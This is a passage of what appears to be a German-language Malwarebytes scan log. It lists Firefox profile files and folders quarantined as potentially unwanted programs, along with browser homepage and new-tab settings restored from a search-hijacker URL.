PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\unit, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\de, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en_US, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\es, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\fr, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\it, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\pt_BR, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264\1.5.1, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\healthreport, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\minidumps, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\saved-telemetry-pings, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\searchplugins, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\sessionstore-backups, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\idb, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\idb\2918063365piupsah.files, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\idb, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\webapps, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],

Dateien: 195
PUP.Optional.WindowsProtectManager, C:\ProgramData\FwinpF\WFini.exe, In Quarantäne, [11945062475290a6ccadae8c17ee21df],
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (user_pref("browser.newtab.url", "hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffseng");), Ersetzt,[8520ddd57029bb7b95b33340d62ffa06]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (p.update.lastUpdateTime.browser-cleanup-thumbnails", 1445874268);
user_pref("app.update.lastUpdateTime.experiments-update-timer", 1445874508);
user_pref("app.update.), Ersetzt,[267f0ca63762a78f1a2edd9620e527d9]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (hile the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_), Ersetzt,[1293b5fd2a6f95a1cc7c6112a5604ab6]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (nning,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref("accessibility.typeahe), Ersetzt,[c8dddbd7c5d470c66adeb5be8283966a]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (ref("app.update.lastUpdateTime.addon-background-update-timer", 1445874628);
user_pref("app.update.lastUpdateTime.background-update-timer", 1445874868);
user), Ersetzt,[4d58337f5b3ee94d2a1ec1b2f411f709]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (user_pref("browser.startup.homepage", "https://www.malwarebytes.org/restorebrowser/), Schlecht: (user_pref("browser.startup.homepage", "hxxp://www.yessearches.com), Ersetzt,[1293cce6019881b51949d69d37ce7e82]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\searchplugins\DD1B66D4.xml, In Quarantäne, [0b9a0ea42376f73f06261161ce377090],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\logins.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\absLocalStorage.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\addons.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\blocklist.xml, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\cert8.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\compatibility.ini, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\content-prefs.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\DCYoabp08X_ff.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions.ini, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\formhistory.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\healthreport.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\key3.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\mimeTypes.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\parent.lock, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\permissions.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\places.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\pluginreg.dat, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\revocations.txt, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\search-metadata.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\secmod.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\SiteSecurityServiceState.txt, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\times.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\xulstore.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\bookmarkbackups\bookmarks-2015-08-02_14_vyI8dWcKHj7dD5pvymndCA==.jsonlz4, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\crashes\store.json.mozlz4, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\state.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\archived\2015-10\1445874084771.eb83a39e-2542-4b9b-8f15-92b074184ca6.crash.jsonlz4, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\bootstrap.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\install.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\manifest.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\update.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\app.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\blocked.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\content.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\search.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\base\search.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines\ask.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines\duckduckgo.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines\google.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Bold.eot, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Bold.woff, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Light.eot, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Light.woff, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro.eot, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro.woff, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_diagonals-thick_18_b81900_40x40.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_diagonals-thick_20_666666_40x40.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_flat_10_000000_40x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_glass_100_f6f6f6_1x400.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_glass_100_fdf5ce_1x400.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_glass_65_ffffff_1x400.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_gloss-wave_35_f6a828_500x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_highlight-soft_100_eeeeee_1x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_highlight-soft_75_ffe45c_1x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_222222_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_228ef1_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_ef8c08_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_ffd27a_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_ffffff_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\dnt-api\background.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\blocked.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\locale.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\top.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Alien.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\on_off_switch.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\setting.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Top.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
